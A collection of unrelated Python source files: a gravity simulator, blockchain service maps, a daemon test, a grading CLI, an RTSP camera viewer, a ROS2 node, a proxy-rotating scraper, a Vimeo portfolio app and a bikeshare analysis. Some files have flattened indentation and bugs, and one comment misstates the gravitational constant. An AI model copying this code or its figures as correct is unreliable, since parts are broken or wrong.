"""Step the position forward according to the points velocity."""
self.pos += self.vel*timestep
def step_vel(self, timestep=TIMESTEP):
"""Step the velocity forward according to the points acceleration."""
self.vel += self.acc*timestep
def update(self):
"""Update the acceleration according to the objects around it."""
objects = self.space.objects(cur_obj=self)
force = Vector(0, 0, 0)
for obj in objects:
dist = self.pos.dist(obj.pos)
sc_force = G*(self.mass*obj.mass)/(dist**2)
direction = (obj.pos-self.pos)/dist
force += direction*sc_force
self.acc = force / self.mass
def step(self, timestep=TIMESTEP):
"""Step the point forward one timestep."""
self.update()
self.step_vel(timestep=timestep)
self.step_pos(timestep=timestep)
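    # Worked example of update()/step(): for two 1 kg points 1 m apart, the gravitational force
    # is G * (1 * 1) / 1**2 = 6.743e-11 N towards the other point; step() then integrates with
    # semi-implicit Euler (velocity is updated from the acceleration before the position).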
class Photon(Point):
"""A point with 0 mass."""
def __init__(self, pos, direction, space):
"""
Create the photon with its initial attributes.
- pos: Vector (m)
- direction: UnitVector
- space: Space
"""
self.mass = 0
self.pos = pos
self.direction = direction
self.vel = self.direction*c
self.space = space
space.add(self)
def __repr__(self):
"""Return information about the point."""
return f'Photon(mass={self.mass}, pos={self.pos}, vel={self.vel})'
def copy(self, other):
"""Copy the important attributes from another photon."""
self.pos = other.pos
def step(self, timestep=TIMESTEP):
"""Step the point forward one timestep."""
self.step_pos(timestep=timestep)
class Body(Point):
"""A spherical body with a collision hitbox."""
def __init__(self, mass, radius, pos, vel, space):
"""
Create the body with its initial attributes.
- mass: float (kg)
- radius: float (m)
- pos: Vector (m)
        - vel: Vector (m/s)
- space: Space
"""
self.mass = mass
self.radius = radius
self.pos = pos
self.vel = vel
        self.space = space
        space.add(self)
s = Space()
bh = Point(float('Inf'), Vector(0, 0, 0), Vector(0, 0, 0), s)
photon = Photon(Vector(5000, 5000, 5000), UnitVector(1, 0, 0), s)
for i in range(1000):
s.step()
print(bh)
print(photon)
``` |
{
"source": "13thProgression/gold-blockchain",
"score": 3
} |
#### File: chia/util/service_groups.py
```python
from typing import Generator, KeysView
SERVICES_FOR_GROUP = {
"all": "gold_harvester gold_timelord_launcher gold_timelord gold_farmer gold_full_node gold_wallet".split(),
"node": "gold_full_node".split(),
"harvester": "gold_harvester".split(),
"farmer": "gold_harvester gold_farmer gold_full_node gold_wallet".split(),
"farmer-no-wallet": "gold_harvester gold_farmer gold_full_node".split(),
"farmer-only": "gold_farmer".split(),
"timelord": "gold_timelord_launcher gold_timelord gold_full_node".split(),
"timelord-only": "gold_timelord".split(),
"timelord-launcher-only": "gold_timelord_launcher".split(),
"wallet": "gold_wallet gold_full_node".split(),
"wallet-only": "gold_wallet".split(),
"introducer": "gold_introducer".split(),
"simulator": "gold_full_node_simulator".split(),
}
def all_groups() -> KeysView[str]:
return SERVICES_FOR_GROUP.keys()
def services_for_groups(groups) -> Generator[str, None, None]:
for group in groups:
for service in SERVICES_FOR_GROUP[group]:
yield service
def validate_service(service: str) -> bool:
return any(service in _ for _ in SERVICES_FOR_GROUP.values())
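# Worked examples: list(services_for_groups(["farmer-only"])) yields ["gold_farmer"], and
# validate_service("gold_wallet") returns True because it appears in the "wallet" group.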
``` |
{
"source": "13thProgression/peas-blockchain",
"score": 3
} |
#### File: peas/util/service_groups.py
```python
from typing import KeysView, Generator
SERVICES_FOR_GROUP = {
"all": "peas_harvester peas_timelord_launcher peas_timelord peas_farmer peas_full_node peas_wallet".split(),
"node": "peas_full_node".split(),
"harvester": "peas_harvester".split(),
"farmer": "peas_harvester peas_farmer peas_full_node peas_wallet".split(),
"farmer-no-wallet": "peas_harvester peas_farmer peas_full_node".split(),
"farmer-only": "peas_farmer".split(),
"timelord": "peas_timelord_launcher peas_timelord peas_full_node".split(),
"timelord-only": "peas_timelord".split(),
"timelord-launcher-only": "peas_timelord_launcher".split(),
"wallet": "peas_wallet peas_full_node".split(),
"wallet-only": "peas_wallet".split(),
"introducer": "peas_introducer".split(),
"simulator": "peas_full_node_simulator".split(),
}
def all_groups() -> KeysView[str]:
return SERVICES_FOR_GROUP.keys()
def services_for_groups(groups) -> Generator[str, None, None]:
for group in groups:
for service in SERVICES_FOR_GROUP[group]:
yield service
def validate_service(service: str) -> bool:
return any(service in _ for _ in SERVICES_FOR_GROUP.values())
```
#### File: core/daemon/test_daemon.py
```python
from peas.server.outbound_message import NodeType
from peas.server.server import ssl_context_for_server
from peas.types.peer_info import PeerInfo
from tests.block_tools import create_block_tools
from peas.util.ints import uint16
from peas.util.ws_message import create_payload
from tests.core.node_height import node_height_at_least
from tests.setup_nodes import setup_daemon, self_hostname, setup_full_system
from tests.simulation.test_simulation import test_constants_modified
from tests.time_out_assert import time_out_assert, time_out_assert_custom_interval
from tests.util.keyring import TempKeyring
import asyncio
import atexit
import json
import aiohttp
import pytest
def cleanup_keyring(keyring: TempKeyring):
keyring.cleanup()
temp_keyring1 = TempKeyring()
temp_keyring2 = TempKeyring()
atexit.register(cleanup_keyring, temp_keyring1)
atexit.register(cleanup_keyring, temp_keyring2)
b_tools = create_block_tools(constants=test_constants_modified, keychain=temp_keyring1.get_keychain())
b_tools_1 = create_block_tools(constants=test_constants_modified, keychain=temp_keyring2.get_keychain())
new_config = b_tools._config
new_config["daemon_port"] = 55401
b_tools.change_config(new_config)
class TestDaemon:
@pytest.fixture(scope="function")
async def get_daemon(self):
async for _ in setup_daemon(btools=b_tools):
yield _
@pytest.fixture(scope="function")
async def simulation(self):
async for _ in setup_full_system(
b_tools_1.constants, b_tools=b_tools, b_tools_1=b_tools_1, connect_to_daemon=True
):
yield _
@pytest.mark.asyncio
async def test_daemon_simulation(self, simulation, get_daemon):
node1, node2, _, _, _, _, _, _, _, server1 = simulation
await server1.start_client(PeerInfo(self_hostname, uint16(21238)))
async def num_connections():
count = len(node2.server.connection_by_type[NodeType.FULL_NODE].items())
return count
await time_out_assert_custom_interval(60, 1, num_connections, 1)
await time_out_assert(1500, node_height_at_least, True, node2, 1)
session = aiohttp.ClientSession()
crt_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_crt"]
key_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_key"]
ca_cert_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["crt"]
ca_key_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["key"]
ssl_context = ssl_context_for_server(ca_cert_path, ca_key_path, crt_path, key_path)
ws = await session.ws_connect(
"wss://127.0.0.1:55401",
autoclose=True,
autoping=True,
heartbeat=60,
ssl_context=ssl_context,
max_msg_size=100 * 1024 * 1024,
)
service_name = "test_service_name"
data = {"service": service_name}
payload = create_payload("register_service", data, service_name, "daemon")
await ws.send_str(payload)
message_queue = asyncio.Queue()
async def reader(ws, queue):
while True:
msg = await ws.receive()
if msg.type == aiohttp.WSMsgType.TEXT:
message = msg.data.strip()
message = json.loads(message)
await queue.put(message)
elif msg.type == aiohttp.WSMsgType.PING:
await ws.pong()
elif msg.type == aiohttp.WSMsgType.PONG:
continue
else:
if msg.type == aiohttp.WSMsgType.CLOSE:
await ws.close()
elif msg.type == aiohttp.WSMsgType.ERROR:
await ws.close()
elif msg.type == aiohttp.WSMsgType.CLOSED:
pass
break
read_handler = asyncio.create_task(reader(ws, message_queue))
data = {}
payload = create_payload("get_blockchain_state", data, service_name, "peas_full_node")
await ws.send_str(payload)
await asyncio.sleep(5)
blockchain_state_found = False
while not message_queue.empty():
message = await message_queue.get()
if message["command"] == "get_blockchain_state":
blockchain_state_found = True
await ws.close()
read_handler.cancel()
assert blockchain_state_found
``` |
{
"source": "13XxM1CHA3lxX37/artemis_cli",
"score": 3
} |
#### File: artemis_cli/detail/arg_parser.py
```python
import argparse
class ArgParser(argparse.ArgumentParser):
def __init__(self):
super(ArgParser, self).__init__(
description='A command-line application for tutors to more productively '
                        'grade programming exercises on ArTEMiS')
sub_parsers = self.add_subparsers(
title='commands',
dest='command',
description='List of valid commands',
help='Additional help',
parser_class=argparse.ArgumentParser)
# repos
# syntax: ./artemis_cli.py repos -a w01h01 -s ge42abc
repos_parser = sub_parsers.add_parser('repos',
help='Downloads student exercise repositories')
repos_parser.add_argument('-a', '--assignment',
metavar='assignment',
required=True,
help='The assignment to be processed (e.g. w01h01)')
repos_parser.add_argument('-s', '--students',
metavar='tumId',
required=True,
nargs='+',
help='The students\' TUM ids (comma or space-separated) to be processed'
' (e.g. ge36feg, ba12sup, ...)')
# scores (not implemented yet)
# syntax: ./artemis_cli.py scores -a w01h01 -s ge42abc
"""
scores_parser = sub_parsers.add_parser('scores',
help='Get scores for students\' assignments [not yet implemented]')
scores_parser.add_argument('-a', '--assignment',
metavar='assignment',
help='The assignment to be processed (e.g. w01h01)')
scores_parser.add_argument('-s', '--students',
metavar='tumId',
nargs='+',
help='The students TUM ids to be processed (e.g. ge36feg ba12sup, ...)')
"""
# grade
# syntax: ./artemis_cli.py grade -a w01h01 -s ab43cde
# -score 80 -text "Gut gemacht"
# -positive "Kommentare" "Gute Dokumentation"
# -negative "Bitte auf Formatierung achten" "Autoformat nutzen"
result_parser = sub_parsers.add_parser('grade',
help='Submits grade for a student assignment')
result_parser.add_argument('-a', '--assignment',
metavar='assignment',
required=True,
help='The assignment to be processed (e.g. w01h01)')
result_parser.add_argument('-s', '--student',
required=True,
metavar='tum_id',
help='The student\'s TUM id to be processed (e.g. ge42abc)')
result_parser.add_argument('-score',
metavar='score',
required=True,
type=int,
help='The score (0-100) of the assignment (e.g. 80)')
result_parser.add_argument('-text',
required=True,
metavar='result_text',
help='The result text of the assignment (e.g. "Gut gemacht")')
result_parser.add_argument('-pos', '--positive',
metavar=('text', 'detail_text'),
nargs='+', # at least one
action='append',
help='A positive feedback consisting of Text and optionally one Detail Text '
'(e.g. "Dokumentation" ["Gute und akkurate Kommentare"])')
result_parser.add_argument('-neg', '--negative',
metavar=('text', 'detail_text'),
nargs='+', # at least one
action='append',
help='A negative feedback consisting of Text and optionally one Detail Text '
'(e.g."Formatierung" ["Bitte Autoformatierung benutzen"])')
# grades
# syntax:./ artemis_cli.py grades /path/to/gradebook.yml
grades_parser = sub_parsers.add_parser('grades',
help='Submits all grades of a specified gradebook file')
grades_parser.add_argument('-f', '--file',
metavar='gradebook_file',
required=True,
                                   help='A gradebook file as generated by `artemis-cli repos ...` '
                                        'with all grades to be uploaded to ArTEMiS filled in')
# allows only one of the specified arguments
group = self.add_mutually_exclusive_group()
group.add_argument('-q', '--quiet', action='store_true', help='Print quiet')
group.add_argument('-v', '--verbose', action='store_true', help='Print verbose')
``` |
{
"source": "1411102509/INTELLIGENT-SECURITY-MONITORING-SYSTEM",
"score": 3
} |
#### File: INTELLIGENT-SECURITY-MONITORING-SYSTEM/Demo-VideoCapture/showManyWin.py
```python
import cv2
import time
import multiprocessing as mp
"""
Source: Yonv1943 2018-06-17
https://github.com/Yonv1943/Python/tree/master/Demo
"""
# rtsp://admin:[email protected]/Streaming/Channels/1
def image_put(q, ip, username, password):
url = "rtsp://{}:{}@{}/Streaming/Channels/1".format(username, password, ip)
cap = cv2.VideoCapture(url)
while True:
q.put(cap.read()[1])
q.get() if q.qsize() > 1 else time.sleep(0.01)
def image_get(q, window_name):
cv2.namedWindow(window_name, flags=cv2.WINDOW_FREERATIO)
while True:
frame = q.get()
cv2.imshow(window_name, frame)
        # a single waitKey both refreshes the window and polls for the quit key
        if cv2.waitKey(30) & 0xff == ord('q'):
cv2.destroyWindow(window_name)
break
def run_multi_camera(cam_list):
mp.set_start_method(method='fork') # init
processes = []
for cam in cam_list:
queue = mp.Queue(maxsize=4)
processes.append(mp.Process(target=image_put, args=(queue, cam[0], cam[1], cam[2])))
processes.append(mp.Process(target=image_get, args=(queue, cam[0])))
for process in processes:
process.daemon = True
process.start()
for process in processes:
process.join()
if __name__ == '__main__':
ip_list = [["192.168.1.2","admin","admin12345678"],
["192.168.1.11","admin","admin12345678"],
["192.168.1.12","admin","admin12345678"],
["192.168.213.79","admin","abc<PASSWORD>"],
["192.168.213.76","admin","<PASSWORD>"],
["192.168.1.15","admin","admin12345678"]]
run_multi_camera(ip_list)
``` |
{
"source": "1411vi14/gym_ped_sim",
"score": 2
} |
#### File: turtlebot3_social/src/tfodom2actor.py
```python
import tf2_ros
import rclpy
from rclpy.node import Node
from std_msgs.msg import String
from gazebo_msgs.msg import ModelStates
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import SetModelState
import numpy as np
class MountTB2Ped(Node):
def __init__(self):
super().__init__('tf2defaultworld')
self.model_sub = self.create_subscription(
ModelStates,
"/gazebo/model_states",
self.callback,
1)
self.br = tf2_ros.TransformBroadcaster(self)
self.model_set = self.create_publisher(
ModelState, "/gazebo/set_model_state", 1)
self.tb3modelstate = ModelState()
self.tb3modelstate.model_name = "turtlebot3_burger"
#self.actor_name = rclpy.get_param("TB3_WITH_ACTOR")
self.actor_name = self.declare_parameter("TB3_WITH_ACTOR").value
def callback(self, data):
#tb3_idx = data.name.index("turtlebot3_burger")
actor_idx = data.name.index(self.actor_name)
#tb3_pose = data.pose[tb3_idx].position
#tb3_orien = data.pose[tb3_idx].orientation
# br.sendTransform((tb3_pose.x, tb3_pose.y, tb3_pose.z),
#(tb3_orien.x, tb3_orien.y, tb3_orien.z, tb3_orien.w),
# rclpy.Time.now(),
# "tb3",
# "default_world")
actor_pose = data.pose[actor_idx].position
actor_orien = data.pose[actor_idx].orientation
actor_pose.z = 0.0
quat_ = self.quat_trans(actor_orien)
#x = actor_orien.y
#z = actor_orien.x
#y = actor_orien.z
#actor_orien.y = actor_orien.x
#actor_orien.x = x
#actor_orien.y = y
#actor_orien.z = z
self.tb3modelstate.pose.position = actor_pose
self.tb3modelstate.pose.orientation = quat_
# self.model_set(self.tb3modelstate)
self.model_set.publish(self.tb3modelstate)
self.br.sendTransform((0, 0, 0),
(0, 0, 0, 1),
rclpy.Time.now(),
"odom",
self.actor_name)
def quat_trans(self, quat):
euler = tf2_ros.transformations.euler_from_quaternion(
(quat.x, quat.y, quat.z, quat.w))
quat_ = tf2_ros.transformations.quaternion_from_euler(
euler[0]-0.5*np.pi, euler[1], euler[2]-0.5*np.pi)
quat.x = quat_[0]
quat.y = quat_[1]
quat.z = quat_[2]
quat.w = quat_[3]
return quat
def main(args=None):
rclpy.init(args=args)
tf2defaultworld = MountTB2Ped()
tf2defaultworld.get_logger().info('Created node')
rclpy.spin(tf2defaultworld)
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
tf2defaultworld.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
``` |
{
"source": "1415140539/python",
"score": 3
} |
#### File: 1415140539/python/basicSpider.py
```python
import logging,sys
import time
import urllib,random
logger = logging.getLogger("testLogger1")  # pass a logger name
# Customize the logger's output format
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
# Create log handlers: a file handler and a console handler
file_handler = logging.FileHandler("testLogger1.log")
file_handler.setFormatter(formatter)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(formatter)
# Set the default log level
logger.setLevel(logging.DEBUG)  # only records levels >= DEBUG
# Add the file and console handlers to the logger
logger.addHandler(file_handler)
logger.addHandler(console_handler)
PROXY_RANGE_MAX = 10
PROXY_RANGE_MIN = 1
def downHtml(url, headers=[],
             proxy={},
             timeout=10,
             decodeInfo="utf-8",
             num_retries=10):
"""
    A GET request for the crawler, covering HTTP request header settings such as the UA.
    Supports proxy server configuration.
    Handles responses whose status code is not 200,
    as well as timeouts and the page's character encoding.
    :param url:
    :param headers:
    :param proxy:
    :param num_retries:
    :return:
    In general, combining a UA pool with a proxy server pool when fetching a page
    makes the crawler harder to block,
    and the proxy usage strategy can be adjusted dynamically.
"""
html = None
if num_retries <= 0:
return html
    # Dynamically decide whether to use the proxy
if random.randint(PROXY_RANGE_MIN,PROXY_RANGE_MAX) >= PROXY_RANGE:
logger.info("No Proxy")
proxy = None
proxy_handler = urllib.request.ProxyHandler(proxy)
opener = urllib.request.build_opener(proxy_handler)
opener.addheaders = headers
urllib.request.install_opener(opener)
try:
response = urllib.request.urlopen(url)
html = response.read().decode(decodeInfo)
return html
except UnicodeDecodeError:
logger.error("UnicodeDecodeError")
    except (urllib.error.URLError, urllib.error.HTTPError) as e:
        logger.error("urllib error")
        if hasattr(e, "code") and 400 <= e.code < 500:
            logger.error("Client error")  # client-side issue; trace it by analyzing the logs
        elif hasattr(e, "code") and 500 <= e.code < 600:
            html = downHtml(url,
                            headers,
                            proxy,
                            timeout,
                            decodeInfo,
                            num_retries - 1)
            time.sleep(PROXY_RANGE)  # the sleep duration can be customized
except:
logger.error("Download error")
PROXY_RANGE = 2
if __name__ == "__main__":
url = "https://www.douban.com/doulist/3516235/"
headers = [("User-Agent",'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36')]
proxy = {"http":"172.16.17.32:9999"}
print(downHtml(url,headers,proxy))
logger.removeHandler(file_handler)
logger.removeHandler(console_handler)
``` |
{
"source": "1418185965/uiautomator2",
"score": 3
} |
#### File: uiautomator2/catcher/task.py
```python
import time
class Task(object):
def __init__(self, name):
self.name = name
self.period = None
self.d = None
self.device = None
self.applicationid = None
self.version_name = None
self.pid = None
self.interval = None
self.output = None
self.info_list = set([])
def execute(self):
pass
def add_info(self, info):
self.info_list.add(info)
info.task = self
def set_device(self, d):
self.d = d
class RandomTask(Task):
def __init__(self, name):
super().__init__(name)
self.duration = 0.0
def execute(self):
time.sleep(self.duration)
``` |
{
"source": "141Wonders/vimeoalbum-portfolio",
"score": 3
} |
#### File: 141Wonders/vimeoalbum-portfolio/main.py
```python
from flask import Flask, render_template
import vimeo, json
app = Flask(__name__)
client = vimeo.VimeoClient(
#API key SYNTAX GOES HERE
)
#function to get video link, name, and thumbnail from a specified album
def decode_json_reel(client, id):
# Make the request to the server for the "/me" endpoint.
about_me = client.get('/me/albums/'+ id +'/videos?sort=manual', params={"fields": "name,link,pictures.sizes.link"})
# Make sure we got back a successful response.
assert about_me.status_code == 200
# convert response to json object
data_encoded = json.dumps(about_me.json())
# decode the json encoded object
data_decoded = json.loads(data_encoded)
# initialize video data as list of dictionaries
video_data = data_decoded["data"]
return video_data
# returns a list of dictionaries, each dictionary represents a video's data
#function to get ONLY thumbnails from gallery directory album
def decode_json_album(client, id):
about_me = client.get('/me/albums/' + id + '/videos?sort=manual', params={"fields": "pictures.sizes.link"})
# Make sure we got back a successful response.
assert about_me.status_code == 200
# convert response to json object
data_encoded = json.dumps(about_me.json())
# decode the json encoded object
data_decoded = json.loads(data_encoded)
# initialize video data as list of dictionaries
video_data = data_decoded["data"]
return video_data
# returns a list of dictionaries, each dictionary represents a video's data
#function to extract 1920x1080 thumbnail size from GET request into a list
def get_thumbnails(json_list):
#initialize empty list for thumbnail data
thumbnail_list =[]
#this was a lil tricky, this loop connects each thumbnail with the corresponding video data
#We want to get the 1920x1080 image which is the last item in the list, so we use [-1] from the thumbnail list
for i in range(len(json_list)):
filtered = json_list[i]['pictures']
more_filter = filtered.get('sizes')
tn = more_filter[-1]['link']
thumbnail_list.append(tn)
return thumbnail_list
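# Minimal sketch of the expected input shape (assumed from the `pictures.sizes.link` field
# requested above); get_thumbnails keeps the last (largest) size for each video:
#
#   json_list = [{'pictures': {'sizes': [{'link': 'small.jpg'}, {'link': 'large.jpg'}]}}]
#   get_thumbnails(json_list)  # -> ['large.jpg']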
#Landing page of app, includes video data list & thumbnail list
@app.route('/')
def landing():
main_result = decode_json_reel(client,'7693012')
reel_thumbnail_list = get_thumbnails(main_result)
#initialize main_result as a LIST of DICTIONARIES
return render_template('index.html', main_result=main_result, reel_thumbnail_list=reel_thumbnail_list)
#About Me page
@app.route('/about/')
def bio():
return render_template('generic.html')
#Campaign Directory, GET thumbnails from directory album
#page is made into a list, whichever album is picked gets redirected to the next app.route
@app.route('/campaigns/')
def campaigns():
album_result = decode_json_album(client,'9214209')
album_thumbnail_list = get_thumbnails(album_result)
album_result[0]['re_direct'] = "De-Viaje-con-los-Derbez"
album_result[1]['re_direct'] = "Juego-de-las-Llaves"
album_result[2]['re_direct'] = "ANA"
album_result[3]['re_direct'] = "Herederos-Por-Accidente"
album_result[4]['re_direct'] = "De-Brutas-Nada"
album_result[5]['re_direct'] = "R"
album_result[6]['re_direct'] = "I'll-Sleep-When-I'm-Dead"
album_result[7]['re_direct'] = "Maya-The-Bee"
return render_template('campaigns.html', album_result=album_result, album_thumbnail_list=album_thumbnail_list)
#Gets specified campaign route to show its corresponding campaign reel
@app.route('/campaigns/<campaign>/')
def front(campaign):
if campaign == "De-Viaje-con-los-Derbez":
pass_result = decode_json_reel(client,'9231645')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "Juego-de-las-Llaves":
pass_result = decode_json_reel(client,'8246171')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "Herederos-Por-Accidente":
pass_result = decode_json_reel(client,'8136339')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "De-Brutas-Nada":
pass_result = decode_json_reel(client,'8136337')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "R":
pass_result = decode_json_reel(client,'8136327')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "Maya-The-Bee":
pass_result = decode_json_reel(client,'8136345')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "ANA":
pass_result = decode_json_reel(client,'8084695')
pass_thumbnail = get_thumbnails(pass_result)
if campaign == "I'll-Sleep-When-I'm-Dead":
pass_result = decode_json_reel(client,'8136342')
pass_thumbnail = get_thumbnails(pass_result)
return render_template('ind_campaign.html', pass_result=pass_result, pass_thumbnail=pass_thumbnail).format(campaign=campaign)
if __name__ == '__main__':
app.run(debug=True)
``` |
{
"source": "142342/Bikeshare-data-analysis",
"score": 3
} |
#### File: 142342/Bikeshare-data-analysis/bikeshare.py
```python
import time
import pandas as pd
import numpy as np
###############################################################################
############################ Requirements #####################################
# #1 Popular times of travel:
# - Most common month to travel
# - Most common day of week
# - Most common hour of the day
# #2 Popular stations and trips
# - Most common start station
# - Most common end station
# - Most common trip (same start and end stations)
# #3 Trip duration:
# - Total travel time
# - Average travel time
# #4 User information:
# - Counts of each user by type
# - Counts of each user by gender (NYC & Chicago only)
# - Earliest, latest, and most common year of birth for the users
################### Some questions to ask the user ############################
# 1 - Would you like to see data for Chicago, New York, or Washington?
# 2 - Would you like to filter the data by month, day or not at all?
# 2a - If by month, which month?
# 2b - If by day, which day?
###############################################################################
city_files = { 'chicago': 'chicago.csv',
'new york': 'new_york_city.csv',
'washington': 'washington.csv' }
city_keys = list(city_files.keys())
months = {'january': 1, 'february': 2, 'march': 3, 'april': 4, 'may': 5, 'june': 6}
months_key_list = list(months.keys())
months_val_list = list(months.values())
days = {'monday': 0, 'tuesday': 1, 'wednesday': 2, 'thursday': 3, 'friday': 4, 'saturday': 5, 'sunday': 6}
days_key_list = list(days.keys())
days_val_list = list(days.values())
def get_filters():
"""
Asks user to specify a city, month, and day to analyze.
Returns:
(str) city - name of the city to analyze
    (str) month - name of the month to filter by (january to june; an "all" option is not supported)
    (str) day - name of the day of week to filter by (an "all" option is not supported)
"""
print('Hello! Let\'s explore some US bikeshare data!')
# get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs
city = input('Would you like to see data for Chicago, New York, or Washington?\n').strip().lower()
# handling inappropriate inputs for city name
while city not in city_keys:
city = input('City name not found, please enter Chicago, New York, or Washington instead.\n').strip().lower()
# get user input for month (all, january, february, ... , june)
month = input('Would you like to see data for January, February, March, April, May, or June?\n').strip().lower()
# handling inappropriate inputs for month name
while month not in months_key_list:
month = input('Month name not found, please enter a month from January to June, inclusively.\n').strip().lower()
# get user input for day of week (all, monday, tuesday, ... sunday)
day = input('Would you like to see data for Monday, Tuesday... or Sunday?\n').strip().lower()
# handling inappropriate inputs for day name
while day not in days_key_list:
day = input('Day name not found, please enter a day from Monday to Sunday, inclusively.\n').strip().lower()
print('-'*40)
return city, month, day
def load_data(city, month, day):
"""
    Loads data for the specified city and adds the helper columns used for filtering.
    Args:
    (str) city - name of the city to analyze
    (str) month - name of the month chosen by the user (the filter itself is applied later, in print_filtered)
    (str) day - name of the day of week chosen by the user (the filter itself is applied later, in print_filtered)
    Returns:
    df - the raw city DataFrame
    fdf - the same data with added 'month', 'day', 'hour' and 'trip' columns
"""
# load data file into pandas dataframe
df = pd.read_csv(city_files.get(city))
# convert the Start Time to a to datetime format
# year is not needed, since they're all 2017
df['Start Time'] = pd.to_datetime(df['Start Time'], yearfirst = True)
#print(df)
# create new df with columns for month, day, weekday, and hour
fdf = df
fdf['month'] = df['Start Time'].dt.month
fdf['day'] = df['Start Time'].dt.weekday
fdf['hour'] = df['Start Time'].dt.hour
fdf['trip'] = "from " + df['Start Station'] + " to " + df['End Station']
# can also add more filter, based on the day of the month and so on.
#print(fdf['month'])
#By seeing the output, they're returned in numbers, hence the creation
#of dictionaries instead of lists for months and weekdays.
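    # For example (illustrative timestamp, not taken from the data sets):
    #   pd.to_datetime('2017-06-23 15:09:32').month     -> 6   (June)
    #   pd.to_datetime('2017-06-23 15:09:32').weekday() -> 4   (Friday, since Monday == 0)
    # which is why the months/days dictionaries above map names to these integer codes.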
    # the month/day filters chosen by the user are applied later, in print_filtered()
#print(fdf)
return df, fdf
def time_stats(fdf):
"""Displays statistics on the most frequent times of travel."""
print('\nCalculating The Most Frequent Times of Travel...\n')
start_time = time.time()
# display the most common month
mcm =fdf['month'].mode()[0] #most common month as an integer
month_position = months_val_list.index(mcm) #month's position
most_common_month = months_key_list[month_position].capitalize() #month's name
print("The most common month for travel is: " + most_common_month)
# display the most common day of week
mcd = fdf['day'].mode()[0] #most common day as an integer
day_position = days_val_list.index(mcd) #day's position
most_common_day = days_key_list[day_position].capitalize() #day's name
print("The most common day for travel is: " + most_common_day)
# display the most common start hour
most_common_hour = fdf['hour'].mode()[0] #most common hour as integer
print("The most common hour for travel is: " + str(most_common_hour) + ":00")
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def station_stats(fdf):
"""Displays statistics on the most popular stations and trip.
Args:
dataframe
"""
print('\nCalculating The Most Popular Stations and Trip...\n')
start_time = time.time()
# display most commonly used start station
mcus = fdf['Start Station'].mode()[0] # most common start station
print(mcus + " is the most common start station")
# display most commonly used end station
mces = fdf['End Station'].mode()[0] # most common end station
print(mces + " is the most common end station")
# display most frequent combination of start station and end station trip
mc_trip = fdf['trip'].mode()[0] # most common trip
print("The most common trip is " + mc_trip)
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def trip_duration_stats(fdf):
"""Displays statistics on the total and average trip duration."""
print('\nCalculating Trip Duration...\n')
start_time = time.time()
# display total travel time
duration_total = fdf['Trip Duration'].sum(skipna = True)
total_rounded = str(round(duration_total, 1))
print("Total trip durations are: " + total_rounded + " in seconds")
# display mean travel time
duration_mean = fdf['Trip Duration'].mean(skipna = True)
mean_rounded = str(round(duration_mean, 1))
print("The average trip duration period is: " + mean_rounded + " in seconds")
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def appearance_count(fdf, column):
    '''Prints how many times each unique value appears in the given column.
    Args:
    (dataframe) fdf, having valid data.
    (str) column, name of the column whose value counts should be printed.
    Returns:
    Nothing
    '''
print("Here is a count of the appearance of the unique elements in {}".format(column))
print(fdf[column].value_counts())
def user_stats(fdf, city):
"""Displays statistics on bikeshare users.
Args:
dataframe
Returns:
Nothing
"""
print('\nCalculating User Stats...\n')
start_time = time.time()
# Display counts of user types
appearance_count(fdf,'User Type')
print(city)
# Display counts of gender
    if city == 'washington':
        print("Gender and birth year data are unavailable for Washington")
    else:
        appearance_count(fdf, 'Gender')
        # Display earliest, most recent, and most common year of birth
        # ('Birth Year' is also missing from the Washington data, so this stays inside the else branch)
        print("The oldest customer was born in: " + str(int(fdf['Birth Year'].min()))
              + ", the youngest was born in " + str(int(fdf['Birth Year'].max())) +
              ", while the most common birth year was " + str(int(fdf['Birth Year'].mode()[0])))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def print_filtered(fdf, month, months, day, days):
'''Continuously asks the user if he wants to see the raw data, showing 5
lines at a time.
Args:
Takes the dataframe, month, months, day, and days.
These have already been previously entered through get_filters().
Returns:
Nothing, but prints the dataframe 5 lines by 5 lines.
'''
#filtered = fdf[(fdf['month'] == month) & (fdf['day'] == day)]
#fdf = fdf[(fdf['month'] == month) & fdf['day'] == day]
accepted_inputs = ['yes', 'no']
m = months.get(month)
d = days.get(day)
    view = str(input("Do you want to preview a section of the filtered DataFrame?\nAnswer with \'Yes\' or \'No\' \n")).lower().strip()
    while view not in accepted_inputs:
        view = input("Please enter an appropriate input; either \'Yes\' or \'No\' \n").lower().strip()
    pd.set_option('display.max_columns',13)
    if view == 'yes':
#print the first 5 rows upon the user's request
print("Below is the first 5 rows of the filtered DataFrame")
filtered = fdf[(fdf.month == m) & (fdf.day == d)]
print(filtered.iloc[:5, :])
start = 0
end = 5
view_again = str(input("\nWould you like to view 5 more rows?\nPlease answer with \'Yes\' or \'No\' \n")).lower().strip()
while view_again not in accepted_inputs:
view_again = input("Please enter an appropriate input; either \'Yes\' or \'No\' \n").lower().strip()
#the while loop to print until user does not want to continue
while view_again == 'yes':
start+=5
end+=5
print("\nBelow are the next 5 rows of the data")
print(filtered.iloc[start:end, :])
            view_again = str(input("\nWould you like to view 5 more rows?\nPlease answer with \'Yes\' or \'No\' \n")).lower().strip()
#checking for unacceptable inputs
while view_again not in accepted_inputs:
view_again = input("Please enter an appropriate input; either \'Yes\' or \'No\' \n").lower().strip()
else: print("You have chosen not to view any of the raw data")
def main():
while True:
city, month, day = get_filters()
df, fdf = load_data(city, month, day)
time_stats(fdf)
station_stats(fdf)
